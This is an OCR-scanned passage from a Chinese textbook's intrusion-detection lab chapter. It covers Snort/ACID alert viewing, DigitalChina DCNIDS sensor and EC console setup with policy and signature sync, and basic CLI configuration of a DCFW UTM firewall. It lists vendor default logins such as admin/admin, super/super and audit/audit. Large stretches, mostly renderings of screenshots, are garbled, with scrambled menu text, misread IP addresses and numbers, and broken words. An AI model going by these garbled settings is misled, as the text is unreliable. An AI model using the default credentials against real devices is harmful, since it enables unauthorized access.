规则 ,将 #include 前 的 # 去 掉 ,表示 启用 此 条 规则 。 参照 上 一 步 启 动 Snort 并 用 浏览 器 打 
F acid 控制 台 , 单 击 TCP 后 的 数字 ,将 显示 所 有 检测 到 的 TCP 和 数据 包 的 详细 情况 ,如 
图 9-30 所 示 。 

不 要 关闭 Snort, 打 开 SuperScan 对 检测 网 段 扫描 ,打开 acid 查看 检测 结果 ,如 图 9-31 
所 示 。 
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i XED MIE FEV WEO HEO HMO ID EW EIH EE 
i0 0- Ohare mr mammaen 
Thik 本 htp:/1127.00.1:500B01acdjacd_man php 司 日 izp e» 


E3 eNindows Media $]Tindovs e RífBotNas:19] Bp 
ACID: ... [Analys... e] ERE... | 


E 
(Sensors: 1 (Traffic Profile by Protocol 
Unique Alerts: 34 ( 10 (TPED 
categories ) 
Total Number of Alerts: 2021 UDP (< 1%) 
* Source IP addresses: 41 一 ] 
© Dest. IP addresses: 108 | 2MP (20%) 
@ Unique IP links 196 | 
* Source Ports: 762 |Poriscen Traffic (096) 
O TCP ( 749) UDP 
3) 
* Dest. Ports: 19 
O TCP (8) UDP 司 
suh 80 $4522 29. 


图 9-30 检测 TCP 数据 包 
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图 9-31 acid 检测 结果 


G 9.2 DCNIDS Sensor 和 EC 的 配置 管理 


一 般 的 网 络 环境 IDS 硬件 Sensor 都 是 旁 路 接 人 到 核心 交换 机 上 ,通过 在 核心 交换 上 做 
镜像 将 流 经 核心 交换 上 联 口 的 数据 镜像 到 IDS Sensor 所 连 交 换 机 接口 。 然 后 通过 控制 台 
EC 对 IDS 收 到 的 数据 进行 归 类 ,统计 和 分 析 。 

【 实 训 目的 】 

(1) 熟练 掌握 IDS 的 Sensor 网 络 配置 和 管理 。 

(2) 熟练 掌握 IDS 的 EC 配置 和 管理 。 

【 实 训 环境 】 

神州 数码 DCNIDS-1800-M3 和 人 侵 检测 系统 2 台 , 微 机 4 台 。 

【 实 训 内 容 】 


1. Sensor 设置 


(1) 登录 Sensor 管理 界面 。 通 过 超级 终端 打开 Sensor 管理 界面 ( 波 特 率 9600, 数 据 位 8， 
流 控 无 ) 。 
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注意 : 有 些 硬件 批 次 Sensor 提供 了 键盘 “Sm 
以 及 显示 器 的 接口 ,如 果 Sensor 接 了 键盘 , 则 nens shin R3 版 本 硬件 缺 省 用 户 名 和 密码 都 是 admin, 
Tum A 老 硬件 V1 及 R2 只 有 密码 ， 缺 省 为 dcdemo 
无 法 通过 Console 口 来 配置 。 MEE Ede rudi Us 
初始 打开 的 Console 界面 如 图 9-32 所 示 。 
输入 用 户 名 和 密码 后 打开 如 图 9-33 所 示 的 监控 页 面 。 


l 

— 

| 

| Started Wed Apr 6 13:33:14 

i 

| cu x [ 1 Packet Reception M ) 
| total: 84367 

| Real Men (M l current: T31/sec 

| total: — 100488 average: 1005/sec 
| free; — 52TEB peak: 1133/ sec 

| 

| Virtual e ENNNN 1 

| total: 305116 

| free: — 204TIEB 

I 

| Disk Space MN 1 Protocols Protection groups 
| total: — 34T4NB installed: 68 installed: 391 
| free: — 322308 loaded: 43 loaded: 226 
I failed: 0 failed: [| 
i 


图 9-33 监控 页 面 


(2) Sensor 网 络 配置 。 从 监控 页 面 按 Enter 键 打开 Sensor 主 菜单 页 面 ,然后 通过 键盘 
选项 键 选择 Configure networking 选项 后 按 Enter 键 ,如 图 9-34 所 示 。 


DCNIDS-1800-M2 


Return to status monitor 
Access administration 
Set date and tiae 


Network information 
Purge all data 
Restart the Sensor 
Halt the Sensor 


一 Fl to help 一 


一 = — Ul 
| Netvork Configuration | 

| 

| DcNIDS-1800-42 9.0 l 

|[* + 

| 

Il Vane of this Station: DEME | 

和 "1 

] Jeanateaent Interface: eth 一生 按 Enter 键 后 通过 上 下 LEE FSensorl B SPRERET 
| Jianageaent IP Address: 192. 168.1.90 一 -配置 Sensor 的 管理 IP 

| Network Mask: 255. 258. 255. 0 | 

| Default Route: ! 

| IP of Server: 192.168. 1.50 一 -一 此 处 配置 EC (安装 EC 软 那 

| TP of Second Server: 5 

| Encryption Passphrase: 

| Repeat Encryption Passphrase: - 致 ) 

1 i 

| | 

| [Save] 完成 配置 后 保存 Kcanee] | 

Ln =- -i 


图 9-34 Sensor 网 络 配置 
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单 击 Save 后 输入 y Sensor 会 重新 启动 系统 ,如 图 9-35 所 示 。 


Network Configuration 


DCNIDS-1800-32 9.0 


Name of this Station: DCNIDS1800N2 


This will restart the sensor. 


Are you sure? (y/r) :是 


[isave] [Cancel] 


= ——— = IEEE S 


图 9-35 重新 启动 系统 


(3) 更 改 Sensor 登录 密码 。 打 开 Sensor 主 菜单 ,选择 Access administration 项 ,如 图 9-36 
所 示 。 


Management Menu 


| 
DCNIDS-1800-1 
SA ——— A 


Return to status monitor 


Set date and tine 
Configure networking 
Network information 
Purge all data 

| Restart the Sensor 
Halt the Sensor 


一 Fl to help 一 


Set Administrator password 


DCNIDS-1800-M2 9.0 
li —— —-— ——— 


Set Administrator password: *#### if ap 
Repeet Administreter pesemrdi secre A 


GNE 保存 [Cancel] 


图 9-36 更 改 密码 
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注意 : 不 建议 修改 Sensor 密码 ,如 需 修改 ,请 一 定 要 牢记 修改 后 的 密码 ,否则 一 旦 密码 
忘记 只 能 将 设备 返 厂 重 新 做 系统 ! 
2. 安装 EC 程序 


安装 环境 说 明 : 控制 台 建 议 使 用 Windows Server 2003 ,目前 暂 不 支持 Windows Server 
2008 及 Windows 7 系统 。 打 开 安 装 光盘 , 单 击 DigitalChina_NIDS. exe, 如 图 9-37 所 示 , 按 
照 从 上 到 下 的 顺序 安装 程序 。 


安装 管理 控制 台 
安装 报表 及 查询 工具 


图 9-37 安装 界面 


首先 安装 MSDE 数据 库 ,其 次 安装 日 志 服务 器 ,事件 收集 服务 器 和 管理 控制 台 , 最 后 安 
装 报表 及 查询 工具 。 

CD 安装 MSDE 数据 库 。 单 击 “ 安 装 MSDE” 项 ,出 现 如 图 9-38 所 示 的 界面 ,设置 数据 
库 密码 后 单 击 OK 按钮 即 可 。 


E! MICROSOFT SQL SERVER 2000 DESKTOP ENGINE CONFIG Lx] 


etup process will install "MICROSOFT SQL SERVER 2000 DESKTOP 
(“MSDE”) SERVICE 


PACK 3* in you computer. 
ease Config access password and setup path. 


Password Setting 


User nne | 
oo DM 
tim [| Ao o 


-Setup Path 


Fearn — 5575 5 — nummi 
[i 


图 9-38 安装 MSDE 数据 库 
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(2) 安装 日 志 服务 器 。 单 击 * 安 装 日 志 服务 器 ”, 单 击 * 下 一 步 "按钮 或 "是 ?按钮 ,出 现 如 
图 9-39 所 示 输 入 信息 ,其 中 “数据 库 创建 路 径 配置 "和 “安全 事件 数据 文件 本 地 存放 路 径 配 
置 "两 个 目录 之 前 要 先 创建 好 。 


Ó EERBSURQES 


图 9-39 安装 日 志 服 务 器 


单 击 "测试 ?按钮 ,提示 数据 库 连接 测试 成 功 , 单 击 * 确 定 "按钮 ,提示 数据 库 初创 建成 功 。 
如 单 击 “ 测 试 ”按钮 未 能 提示 测试 成 功 ,将 服务 器 重启 即 可 。 

(3) 安装 事件 收集 服务 器 。 单 击 “下 一 步 "按钮 或 “是 ”按钮 ,直至 提示 完成 。 此 时 会 提 
示 如 图 9-40 所 示 信息 , 单 击 “ 确 定 ” 按 钮 ,最 后 安装 完毕 再 安装 许可 文件 。 

(4) 安装 管理 控制 台 。 单 击 “ 下 一 步 " 按 钮 或 “是 "按钮 ,直至 最 后 单 击 “ 完 成 "按钮 。 

O) 安装 报表 及 查询 工具 。 单 击 “ 下 一 步 "按钮 或 “是 "按钮 ,直至 最 后 单 击 “ 完 成 按钮。 

(6) 安装 许可 文件 。 选 择 “ 开 始 ”>“ 所 有 程序 ”>“ 神 州 数码 入 侵 检测 系统 ”>“ 神 码 数 
码 入 侵 检 测 系 统 ( 网 络 )”>“ 安 装 许可 证 命令。 浏览 选 中 许可 文件 ,如 图 9-41 所 示 , 单 击 
“安装 "按钮 。 安 装 完毕 重启 服务 。 


图 9-40 安装 收集 服务 器 图 9-41 安装 许可 文件 


(7) 开启 服务 。IDS 的 三 个 服务 默认 都 是 关闭 的 , 需 在 “开始 ”>“ 所 有 程序 ”>“ 神 州 数 
码 入侵 检测 系统 ”>“ 神 州 数码 入 侵 检测 系统 (网 络 )”>“DCNIDS 服务 管理 ”中 开启 三 项 服 
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务 。 三 项 服务 分 别 是 事件 收集 服务 .安全 事件 响应 服务 IDS 数据 管理 服务 。 
3. 配置 EC 同步 签名 及 策略 下 发 


(OD 创建 用 户 管理 员 。 使 用 系统 管理 员 账 号 登录 控制 台 并 创建 一 个 用 户 管理 员 , 系统 
管理 员 用 户 名 和 密码 默认 都 是 Admin, 如 图 9-42 所 示 。 


942 登录 控制 台 


登录 后 首先 创建 一 个 用 户 管理 员 ,如 图 9-43 所 示 。 添 加 完毕 , 单 击 “确定 ”按钮 。 
注意 ; 密码 必须 同时 包含 数字 、 字 母 , 且 长 度 必须 大 于 等 于 8 位; 添加 新 用 户 时 ,账户 信 
息 必须 添加 完整 。 


R sudit administrator 

是 haiiter 

Auser administrator 
Å Mainistrator. 


系统 初始 的 账户 : Admin 
只 能 做 账户 管理 和 审计 用 ， 
我 们 必须 添加 一 个 新 的 账户 
并 赋予 该 账户 相关 的 权限 


rhujysildi gi talehina. con | n 
user administrator E z 
E | 


图 9-43 ”创建 用 户 管理 员 


COD 使 用 新 增 用 户 登录 控制 台 ,并 添加 logserver, 如 图 9-44 所 示 。 
登录 成 功 后 ,在 组 件 中 添加 日 志 服 务 器 ,如 图 9-45 所 示 。 


AM Zla 


Im 6 
Qr 2; —-—- 
SEMEA SEMENO THRU WIO exec) Gass) Mores 


图 9-45 添加 日 志 服务 器 


ENSEM S: 单 击 “ 确 定 ” 按 钮 ,在 弹出 的 对 话 框 中 输入 信息 ,如 图 9-46 所 示 , 单 


容量 查询 定时 (小 时 ): 


C TERE 


安全 事件 省 村 容量 AW): 
安全 事件 景 大 容量 A): 
WiHEREESRGO: 
审计 记录 最大 容量 条 ) 
FGHSEESR(GO: 
FRBSRXSRGO: 


CEBWER 


添加 完 logserver 后 ,双击 logserver 


所 示 。 


图 9-46 添加 完毕 显示 界面 


图 标 , 检测 logserver 的 容量 等 信息 ,如 图 9-47 


单 击 “ 是 ”按钮 ,出 现 如 图 9-48 所 示 的 界面 , 单 击 “ 确 定 ” 按 钮 。logserver 创建 完毕 。 


(3) 添加 Sensor。 


图 9-49 所 示 。 


在 组 件 处 右 击 添加 组 件 ,选择 


传感器 ”项 , 单 击 “ 确 定 ” 按 钮 ,如 
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HERSSEHRR 


IO 文件 E) 视图 (Y) IAC) Won 


Jj o $a 
安全 事件 报表 — x9 g 


图 9-49 添加 Sensor 


在 添加 传感器 时 需要 定义 组 件 名 称 , 输 入 IP 地 址 (该 IP 地 址 为 Sensor 管理 接口 I P 地 
址 ) ,当前 策略 可 以 暂 选 Default, 传 感 器 密 钥 需 要 与 Sensor 上 配置 密 钥 一 致 ,如 图 9-50 
所 示 。 

提示 : 在 测试 之 前 ,可 以 先 在 安装 EC 的 PC 的 命令 行 中 测试 一 下 Sensor 的 服务 端口 
(tcp 1968) 是 否 打 开 , 测 试 方法 如 下 : telnet 192. 168. 1. 90 1968。 
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本 本 配置 一 

组 件 名 称 : mm 

TT 地址: Jrom 
当前 第 略 ; Default x 
eR en 


Sensor 的 管理 接口 地 址 
没有 特殊 应 用 的 话 建 
XDefault lli 

TE 9]: M ENS 


图 9-50 添加 组 件 


如 果 系 统 返 回 如 图 9-51 所 示 的 界面 , 则 测试 连接 没有 问题 , 若 无 反 应 , 则 需 检 查 EC 到 


Sensor 之 前 是 否 添加 防火 墙 。 单 击 "连接 测试 "按钮 ,出 现 如 图 9-52 所 示 的 对 话 框 , 单 击 * 确 
定 ” 按 钮 。 


二 出 WIIDOYWS\s7s RALIS exe 


Getserver 1.9 - identify yourself: 


challenge 3BA53826965F1325D2A8B7D740459EFB647CC4BA 


图 9-51 测试 Sensor 


最 后 在 “传感器 属性 配置 "对 话 框 中 单 击 * 确 定 " 按 钮 ,如 图 9-53 所 示 。 


[x] 
par————— — 连接 测试 
mC 
[Default E LT 


Bigitalchina NIDS Console 


Sg LEE 可 以 正常 获 职 4 
Sensor 

置信 二 条 saw. 
在 4 种 后 执行 默认 操作 ( 确定 ) 4 


图 9-52 测试 连接 图 9-53 属性 配置 
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C 会 将 策略 文件 发 送 到 Sensor 中 ,如 图 9-54 所 示 。 


应 用 策 咯 : 发 送 策略 文件 到 Sensor ,请 稍 候 


图 9-54 将 策略 文件 发 送 到 Sensor 


策略 文件 发 送 完成 后 , Sensor 会 重新 启动 ,需要 等 待 几 分 钟 ,如 图 9-55 所 示 。 


完毕 ，Sensor 会 重启 
次 下 发 成 功 ， 启 动 
发 时 间 才能 连接 ， a 
" mamme [Roc | 


图 9-55 重新 启动 


策略 下 发 完毕 后 可 以 从 Sensor 看 到 CPU 较 高 (正常 ) , 需 等 待 CPU 恢复 到 正常 范围 后 
EC 组 件 Sensor 处 显示 连接 才 会 正常 。 等 待 时 间 十 几 分 钟 ,如 图 9-56 所 示 。 


Started Fri Apr 1 17:33:26 


coi  NNNEED Packet Reception (MN 1 
total: 161140 


Real Men — NE ] current: 400/sec 
total: — 1004MB average: 382/sec 
free: 44105 peak: 192/sec 

Virtual Men 
total: — 3051MB 
free: 20435 

Disk Space MEN ) Protocols Protection groups 
total: — 3474MB installed: 68 installed: 39 
free: 3224N5 loaded: 43 loaded: 22 

failed: 0 failed: 


图 9-56 CPU 利用 率 


等 待 CPU 占用 恢复 正常 后 ,Sensor 会 显示 连接 成 功 , 如 图 9-57 所 示 。 

(4) 根据 系统 提供 的 策略 模板 ,派生 一 个 策略 文件 。 建 议 使 用 Default 策略 来 派生 新 策 
略 , 单 击 “策略 "按钮 , 单 击 “ 编 辑 锁 定 ” 项 ,在 Default 策略 处 右 击 ,选择 “派生 策略 ”项 ,如 
图 9-58 所 示 。 


|Q xt) WEN) IAC) Wt) 

GN AO e z Ee | [2] 

[C ME EE NE BECRR MS - 3E 

EDERA XERO T Haus) ERMID SARGO GASESC) UEL: 


aec G esa | 
loosever EIER 
Ce ) seem. [ux 
,一 一 一 一 一 | 


图 9-57 连接 成 功 
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1D 文件 E) NEV IAT) TEH 


a EE [ dhcp 

由 回 白 is 

由 Lo enterprisesoftware 
sO finger 


图 9-58 策略 模板 


新 派生 的 策略 不 妨 用 ids 来 表示 ,如 图 9-59 所 示 。 
新 策略 派生 完毕 , 单 击 “ 解 除 编辑 锁定 ”项 ,从 图 9-60 


中 可 以 看 到 ids 即 为 派生 的 策略 。 请 入 第 四 新 名 称 : Cx] 
(5) 同步 签名 。 策 略 添加 成 功 , 见 图 9-61 ,需要 将 EC 3 


攻击 特征 文件 (签名 库 ) 同 步 到 Sensor 中 。 
EC 将 签名 同步 到 Sensor 中 比较 费时 ,为 了 使 同步 顺 图 9-59 策略 命名 


9 章 “入侵 检测 系统 
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Ə 文件 E) WE() IAD WR) 


A AO g 4 g| | o 
安全 事件 报表 查询 策略 | a 用户 RKAS XT 
6 SANE D SuNSO Ld ETIO C ewm) X ARREO 
REE — 1 11 -*| ids( 用 户 目 是 又 策略 ， 可 编辑 ) 
mu = 
E] HE F packages | 
BES 由 sin ”解除 编辑 锁定 
SA attack 
D For Windows Networks 由 回 白 authentication 
$ EO bedfiles 
Dim seewity netena e 1*4 Lii 
sion | SED mane 
[E] server Desena 中 Hd PE RE 
SBO ins meimo list 
D Feb Watcher 由 $00 enterprisesoftware dst e gir 
Op finger 
Chia ; 2 日 8 ftp 
Fr 一 一 一 由 口 白 t 
"o — pbt i 策略 就 是 派生 出 -Sensor 的 策略 


图 9-60 派生 策略 
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Q 文件) WE) IAD Wb) 


à.m elg £$|n2l|9» 
DNE m9 | 和 ED AP Manes XT 
ETUNA SIRNO THURU SEMID EARNED) RSS) 
aec C eea | 

加 oosever 


TERNA 


图 9-61 同步 签名 


利 进行 ,把 Sensor 的 监控 口 的 网 线 拔 掉 , 这 样 会 降低 Sensor 资源 的 消耗 节省 时 间 , 如 
图 9-62 所 示 。 

(6) 应 用 策略 到 Sensor 中 。 同 步 签名 完成 ,如 图 9-63 所 示 ,需要 将 派生 的 ids 策略 应 
用 到 Sensor 中 。 

将 派生 的 新 策略 ids 应 用 到 Sensor 中 ,在 图 9-64 中 单 击 * 应 用 ?按钮 。 在 图 9-65 中 可 
以 看 到 策略 正在 应 用 到 Sensor 中 ,策略 下 发 需要 几 分 钟 。 

策略 下 发 完毕 ,Sensor 会 重启 。 因 此 图 9-66 中 Sensor 连接 处 显示 中 断 , 此 处 等 待 时 间 
较 长 。 
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Ə XHE) won - e 


9 
sem A owe) bo. 5 ME 


dbi) SURED THRI RERI AARSE) GASESC [U] 重 且 主机 (H) C 重启 引擎 (E) x Wem 


c ic G asa | 
[jj tooserver  ESER 
SP sensor |meem [o — es z— 
I 地 址 [wwro o — [a —— | 
aoo [ww  — — n [o — | 
amans poncmees o i: [35919 | 
j: 备份 PC 的 IP 地 址 : 


区 | 
, 


HP og 
安全 事件 SR £8 


logserver 
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IÐ IHO WB) IAD Wh) 一 


db onis) XERE TREFU SED SARRO Gass URBIS) 回 


[eP À à Queen 


图 9-62 签名 过 程 


54& 18% 签名 库 : 4_1_25T11033002 k 组 件 :7 ,. 
. 10% 41% 8% ”著名 库 ; 4_1_.2ST11033002 * 组 件 :7.1 
41% ”组件 :7, 1,2,30 


图 9-63 应 用 策略 


[For Windows Netorks. 
[Lan Security Defend 
[A Secwity Policy Violation 


didi 


DyServer Defend 
Dyre Fatcher 
idsi 


图 9-64 策略 应 用 中 
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M 文件 E) SUB) IAW WE) 


€ |. € á E| 9 
Ies | ux S | EL: E PR E 
db coss) QS NBMENMO) 了 MeugrM) ERN SARTO GASESC) JÜEBEZÜU) 


BT cp esa | 
logserver 基本 配置 
Se sensor C Ld LI 


Jc —,Á.. 


iiia LAM, 


3 127.0.0.1 / 3002 T 
S£ Sensor 192.166.190/19.. 7% 41% 8% 80:4 125711033000 k 180:7.1 
B) loosever 127.0.0.1 / 3003 1% 54% 41% 组 件 :7, 1 2 30 


图 9-65 策略 下 发 
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19 文件 E) QUE 3 p 


Ide o) 
Aom DS (2]g B xe X mm 
P amara NE T 修改 组 件 (M) SUERA) SAREE 人 @O 同步 答 名 (G) : 


ET EL | 
r ER -MM 
ra [pe | 


w nm [e 


dasima. TT 


组 件 图 gg 

EAEE E | Cpu. jme ig | 版 本 
Pec 127.0.0.1 / 3002 1% 54% 18% 签名 库 : 4_1_25T11033002 
E sensor 192.168.1.90 / 19... 0% 0% 0% Æg :4_1_25T11033002 
O ooserver 127.0.0.1 / 3003 1% 55% 41% 组 件 : 7, 1 2, 30 


1O 文件 E) ADV IAW 帮助 HH) 


ARAARA S || 
db numa XERO TERURU ÅST SARGO GASES J 和 主机 出) IEBSUSG) x WAS 


aec 


: m 
- 


策略 应 用 成 功 ，Sensor 重 启 
后 ， 连 接 显示 正常 ， 可 以 看 
到 当前 策略 是 ids 


[d 9-66 策略 应 用 成 功 
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4. 查看 安全 事件 日 志 


S Dicitalehins MIIS Console 


“安全 事件 ”, 可 以 看 到 签名 库 的 数据 包 会 记录 到 安全 事件 中 ,如 图 9-67 所 示 。 


Lax 
8 192. 168.1. 16500 — ARE 中 风险 低 风险 一 一 通知 
eh 2011.04.02 “安全 事件 风险 频率 统计 图 
8 f 192.19.1.19900 " 
[1 171710707] 
E is 8.1.0) - 
8 Qf 202. 112.80.590) 
e 
|] 
o 
s oso woo oo moo 9 woo zum 
E in 
|I gsserroensig >>> 
(0 asnosi >>> 
图 9-67 安全 日 志 
可 根据 源 IP、 目 的 IP、 事 件 和 传感器 类 型 将 日 志 分 类 统计 ,如 图 9-68 所 示 。 


[4 
E EP 10. 1. 120.24803) 
EP 10. 1. 120.400) 
8 EP 10. 1. 180.191 0) 
EEP 10. 1. 180.210013) 
f 112.90. 172.1300) 
EP 113. 105. 163.2250) 
if 113.142. 10.1900) 
EE 113. 142. 10.2396) 
EEP 113. 142. 13.006) 
BE 113. 142.0. 1600) 
8$ 9 11 112. 161.1580) 
8 BP n6 165.6.250) 
8 gf 119. 188. 11.180) 
EEP 119. 188. 11.570) 
EEP 119. 189.1.390) 
EP 119. 189.1.580) 
8 gf 122. 141.225.2801) 
E 122 141.225.270) 
E f 123. 119. 168.2000) 
& go 123. 125, 115.750) 
EEP 123. 125.65. 556) 
BEP 123. 129.232.2200) 
$ 123.129.232.500) 
8 i23 129.242. 1660) 
$ gf 123. 138.239. 160) 
由 十 123.262.400). 
EHE 123.25. 30. 23009) 
EEP 124 115.7. 1546) 
$ B 124. 131.230.550) 
8 P 124 09.103.390) 
8 B 125. 39. 101.260) 
由 二 125.39. 149.4) 
EEP 125.39. 190.190) 
BEP 125. 30.72.1790) 
8 P 125.39.99.156 01) 
内 PT] 


E M badfiles ati qt parse 071) 
EO hu 
EO isl erre keyarg over flor (1) 

8$ Qm compliance exes "ver reply (1)| 
E Qmm, complice invalid escape 0) 

8 rmi. emi ance: invalid http. versi en 19) 


8mm icem iis wetiv perd CO 
E Å ee uservars: too many. concurrent, sessien| 


图 9-68 日 志 统计 
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&u 9.3 DCFW-1800ES-UTM 常用 基本 配置 


【 实 训 目的 】 

熟练 掌握 UTM 的 基本 配置 管理 方法 。 

【 实 训 环境 】 

神州 数码 DCFW-1800ES-UTM 统一 威胁 管理 2 台 ,交换 机 2 台 , 微 机 4 台 。 
【 实 训 内 容 】 


1. 初始 登录 基本 配置 
通过 串口 使 用 超级 终端 登录 UTM 的 参数 如 图 9-69 


所 示 进 行 设置 。 
2. 登录 账号 ES 
初始 配置 管理 员 登 录 如 下 。 — 
Pay Noe O Mj 
login: admin 本 
Password: admin 
录 密码 在 命令 行 状态 下 输入 时 不 会 显现 ,确定 输入 正 = 
确 后 直接 按 Enter 键 可 成 功 登 录 。 [ET 
还 有 另外 两 个 角色 的 账号 。 Ah 
超级 管理 员 : super; 初始 密码 : super, —— 


使 用 该 账号 登录 可 对 UTM 进行 版 本 升级 .配置 的 备 

份 及 更 新 .各 种 管理 账号 的 添加 修改 .各 种 许可 证 文件 的 导入 激活 等 操作 。 
审计 管理 员 : audit: 初始 密码 : audit 
对 UTM 进行 日 志 管 理 , 包 括 日 志 策略 的 制定 .日 志 信息 的 查看 等 。 


3. UTM 登录 管理 配置 
对 任意 接口 配置 通信 TP 及 管理 IP( 下 面 以 配置 eth0 接口 为 例 ): 


User Access Verification 
UTM> enable 
UTM# config t 


进入 配置 模式 : 

UTM(config)# set interface eth0 ip 192.168.1.81/24 

为 eth0 接口 配置 通信 IP: 

UTM(config)# set interface eth0 manage - ip 192.168.1.80/24 


为 eth0 接口 配置 管理 IP, 使 用 该 地 址 对 UTM 进行 管理 : 
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UTM(config) # set interface eth0 up 

将 eth0 接口 激活 启用 : 

UTM(config)# set interface eth0 manage - service web 
激活 管理 主机 对 echo 接口 使 用 Web 管理 的 权限 : 
UTM(config)Z set interface eth0 manage - service ping 
激活 管理 主机 对 eth0 接口 进行 Ping 操作 的 权限 : 
UTM(config) # set adminhost 192.168.1.1 


添加 对 UTM 具有 管理 权限 的 主机 地 址 。 添 加 完 上 述 配置 即 可 使 用 IP 地 址 为 192. 


168.1.1 的 主机 通过 Web 方式 对 UTM 进行 管理 。 在 管理 主机 上 打开 浏览 器 ,在 地 址 栏 中 
输入 https://192. 168. 1. 80:2000 后 按 Enter 键 即 可 弹出 登录 页 面 。 


4. 透明 模式 基本 配置 


目前 UTM 配置 透明 模式 只 支持 单 网 桥 。 以 将 eth2 接口 加 入 桥接 组 为 例 ， 
UTM(config) # set interface eth2 transparent 

将 eth2 接口 配置 为 透明 模式 : 

UTM(config) # set interface eth2 up 

将 echo 接口 激活 启用 : 

UTM(config)£ set int vsi ip 192.168.1.1/24 


为 VSI 接 口 配 置地 址 (VSI(virtual system interface) 接 口 主要 实现 在 混合 模式 下 二 层 


和 三 层 的 通信 处 理 ,如 果 UTM 仅仅 工作 在 透明 模式 下 则 此 接口 地 址 可 以 不 配置 ) : 


UTM(config) # set int vsi up 


将 vsi 接口 激活 启用 (只 要 UTM 有 接口 工作 在 透明 模式 下 , 则 VSI 接口 必须 要 有 UP) 。 
5. 恢复 出 厂 配置 


将 UTM 所 有 配置 恢复 出 厂 状态 需要 使 用 super 账户 登录 User Access Verification; 


UTM> enable 
UTM# load default factory 


执行 完 上 述 命令 后 UTM 将 提示 重启 ,重启 完成 后 配置 即 恢复 为 出 厂 时 的 状态 。 
6. 配置 的 备份 下 载 及 上 传 恢复 


COD 配置 备份 。 以 super 账号 登录 UTM。 在 “配置 管理 ”>“ 下 载 配置 文件 ”中 选择 要 


下 载 的 文件 , 单 击 “ 确 定 ”, 可 直接 打开 或 者 保存 至 本 地 ,如 图 9-70 所 示 。 
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AEn (ETREX | 上 | RES ERO 


B0, = 
ES | T: [SBEEX V | 
D wes 


ns | 


Do you wart to open or save this fle? 


Name: hawkD.config 
Tipe: Urkmonn Fie Type. 
Fom: 192.158.180 


Coe Js j[Lem | 


While fies irom the rtemet can be use, some fles can potertialy 
ham your computer. F you do nat tst fhe source, do not open or 
save this fle. What's the rec 


图 9-70 配置 备份 


(2) 上 传 恢复 备份 配置 文件 并 应 用 到 当前 配置 。 在 “配置 管理 ”上传 配置 文件 ”中 单 
Browse 按钮 ,找到 已 备份 的 配置 文件 ,选择 上 传 至 "当前 配置 文件 ”, 单 击 “ 确 定 ” 按 钮 ,如 
图 9-71 所 示 。 


图 9-71 备份 应 用 当前 配置 


将 已 上 传 的 配置 加 载 使 之 生效 ; 在 “配置 管理 ”>“ 运 行 配置 文件 ”中 选择 “加 载 当 前 配 
置 "项 ; 然后 单 击 "确定 "按钮 ,配置 加 载 , 这 时 配置 马上 生效 ,如 图 9-72 所 示 。 


S| 


9-72 配置 加 载 生 效 
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(3) UTM 系统 升级 。UTM 的 升级 也 是 需要 以 super 账号 登录 进行 操作 。 
(D 更 新 许可 证 文件 。 在 “产品 更 新 ”>“ 系 统 许可 证 更 新 ”中 导入 新 系统 的 许可 证 文件 。 
单 击 “ 确 定 ” 按 钮 导入 成 功 , 单 击 “ 重 启 ” 按 钮 ,重启 UTM, 如 图 9-73 所 示 。 


IET] | 
I BEER: ojexobtbtom-- 
| j | spenn 
L tipte | 回 sstm pae [o Rare @ Bde 


[interface — 回 NATPokey — [v|SeariyPoky [7] Sysog 
@ Network Opject [v] Trafic Policy — [v] Loca Authentication 


许可 特性 : 高 级 功能 种 块 
[OD goer. gos gar 
H atx 回 PsecwN — [Pee mwN 
[V] Authentication [y] Dhodent [7] High Avalabiity [p] GSMÁgent 
grs 回 )Xapdae [J Sa vN 


图 9-73 许可 证 更 新 


O 更 新 系统 映像 文件 。 步 又 重启 完成 后 再 打开 “产品 更 新 ">" 系统 映像 更 新 ”上 传 
新 版 本 的 系统 映像 文件 ,上 传 成 功 后 单 击 "重启 ”, 再 次 重启 UTM, 如 图 9-74 所 示 。 


la 首页 
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|| 
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EE: ARRENE ATARIN EEA 
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aÐ 
图 9-74 系统 映像 更 新 


@ 重启 后 对 各 应 用 模块 许可 证 文件 进行 更 新 。 在 X-Update>“ 许 可 证 更 新 ”中 将 各 模 
块 许可 证 文件 上 传 ,如 图 9-75 所 示 。 


病毒 特征 库 -ClDocuments and Settngs\la Bowse | 


芝 贡 邮件 竺 征 库 :CIDoauments and Settings\le Browse... | 


应 用 协议 特征 库 .CDocUmants and SettngslLe | Bowe | 


Er? — [ET 二 sa 
| 


e G 
图 9-75 许可 证 文件 更 新 
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上 传 后 在 “许可 证 激活 ”中 依次 将 各 许可 证 激活 ,如 图 9-76 所 示 。 
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图 9-76 许可 证 激活 
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